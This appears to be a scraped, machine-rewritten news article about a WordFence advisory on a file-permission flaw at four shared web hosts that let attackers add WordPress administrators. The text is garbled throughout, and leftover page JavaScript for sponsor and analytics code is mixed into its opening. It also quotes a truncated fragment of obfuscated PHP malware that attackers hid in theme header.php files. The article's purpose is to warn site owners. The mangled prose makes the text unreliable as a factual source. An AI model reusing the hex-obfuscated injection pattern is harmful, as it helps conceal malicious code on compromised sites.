//Web Host Vulnerability Discovered on iPage, FatCow, PowWeb and NetFirm via @martinibuster
1559597360 web host vulnerability discovered on ipage fatcow powweb and netfirm via martinibuster 760x490 - Web Host Vulnerability Discovered on iPage, FatCow, PowWeb and NetFirm via @martinibuster

Web Host Vulnerability Discovered on iPage, FatCow, PowWeb and NetFirm via @martinibuster

 

 

web host vulnerability discovered on ipage fatcow powweb and netfirm via martinibuster - Web Host Vulnerability Discovered on iPage, FatCow, PowWeb and NetFirm via @martinibuster

web host vulnerability discovered on ipage fatcow powweb and netfirm via martinibuster - Web Host Vulnerability Discovered on iPage, FatCow, PowWeb and NetFirm via @martinibuster & # 39;);

h3_html = & # 39;

& # 39; + cat_head_params.sponsor.headline + & # 39; & # 39;

& nbsp;

cta = & # 39; & # 39; +
atext = & # 39;

& # 39; + cat_head_params.sponsor_text +

& # 39 ;;
scdetails = scheader.getElementsByClassName (& # 39; scdetails & # 39;);
sappendHtml (scdetails [0] h3_html);
sappendHtml (scdetails [0] atext);
sappendHtml (scdetails [0] cta);
// logo
sappendHtml (scheader, "http://www.searchenginejournal.com/");
sc_logo = scheader.getElementsByClassName (& # 39; sc-logo & # 39;);
logo_html = & # 39; - Web Host Vulnerability Discovered on iPage, FatCow, PowWeb and NetFirm via @martinibuster & # 39 ;;
sappendHtml (sc_logo [0] logo_html);

sappendHtml (scheader, & # 39;

ADVERTISING

& # 39;)

if ("undefined"! = typeof __gaTracker) {
__gaTracker ('create', 'UA-1465708-12', 'auto', 'tkTracker');
__gaTracker ("tkTracker.set", "dimension1", window.location.href);
__gaTracker ('tkTracker.set', 'Dimension2', 'Web Development');
__gaTracker ("tkTracker.set", "contentGroup1", "Web Development");
__gaTracker ('tkTracker.send', 'hitType': 'pageview', page: cat_head_params.logo_url, & title> #:; Cat_head_params.sponsor.headline, & # 39; sessionControl & # 39 ;: & # 39;
slinks = scheader.getElementsByTagName ("a");
sadd_event (slinks, click & # 39 ;, spons_track);
}
} // endif cat_head_params.sponsor_logo

WordFence announced that it has discovered a vulnerability in four hosting companies. WordFence warns that although the vulnerability has been corrected, it is possible that sites were hacked before the hotfix.

The server settings allowed hackers to create WordPress administrator accounts from which sites could be exploited with unauthorized code added to the WordPress theme.

WordFence urged site administrators to check if their account is hosted on their site if they are hosted on iPage FatCow PowWeb or ] NetFirm . All four belong to the same company, Endurance International Group.

What was the vulnerability of the server?

Affected servers had permission and file settings that allowed an attacker to view sensitive files. Other vulnerabilities allowed attackers to access the database, add them as administrators and then take control of the site.

This is how WordFence described the vulnerability:

"Four conditions existed that contributed to this vulnerability:

1. The client files are all stored on a shared file system.

2. The full access path to a user's web root directory was public or could be guessed.

3. All directories of the path to the root directory of a customer's site were either traversable worldwide (the "run" bit for all the users' was 1), either by the group (the 'group's' run bit was at 1), and the sensitive files were universal. -readable (the read bit for & # 39; all users & # 39; is equal to 1) or readable in group (the read bit of & # 39; group & # 39; is equal to 1).

4. An attacker could make sure that a program run in the www group reads files in arbitrary locations.

The Sites Could Get Infected

WordFence warned that it took some time before the vulnerability was corrected during which sites hosted on these four hosting providers could have been to be infected.

Site owners are advised to check their user lists to ensure there are no unauthorized administrators. If your site has been assigned, the unauthorized code must be added to the theme.

This is how WordFence described the malicious code:

"If your site was exploited before the patches, the attackers may have added a malware that could still be to be present. Our customers had added hidden code at the top of the header.php file of the active theme, as follows:

<? Php $ {" x47 x4c x4f x42 x41 x4c x53"} [“ddx70x68zx67x64gx”] = "sl x77k x77i"; $ {" x47 x4cO x42 x41L x53"} [“cx7ax66x6dubkdox6ax78″] = " x6c x6f x63 x61t x69 x6fn" $ {"" x47 x4c x4fB x41LS "} [“x67x64x64ex74x62px75fx65i”] =" x68t x6d x6c "; $ {" x47 x4cOB x41 x4cS"} [“x77ix64x68x6bvx6da”] = " x73t x72 x66"; $ {" X47 x4c x4f x42 x41 x4c x53"} [“x66sx75x71x79x6evw”] = "b x6f x74"; $ {" x47 x4cOBAL x53"} [“wx6cx79x63x61x76x62x71x68x6fx6cx75″] = "cac x68 x65"; $ {"G x4cO x42 x41L x53"} [“ryx68x72kux6b”] = " x73 x63h x65 x6d x65"; $ {" x47 x4c x4f x42 x41 x53"} [“x74x6ax6bcx64ex65x69w”] = " x73l x77k x77i x32"; $ {"G x4cOBA x4cS"} [“x79x65x64x73x67x6ahx69x73x67″] = " x73 x6c x74 x65 x69l x73" "

The vulnerability has been corrected

WordFence has revealed the vulnerability of web hosts before making a public announcement. Hosting companies have quickly corrected the vulnerabilities.

However, as WordFence provides, you can view your user lists for unauthorized administrator-level accounts and your header.php file for non-compliant codes.

Read full ad on the WordFence blog

Images of Shutterstock, edited by the author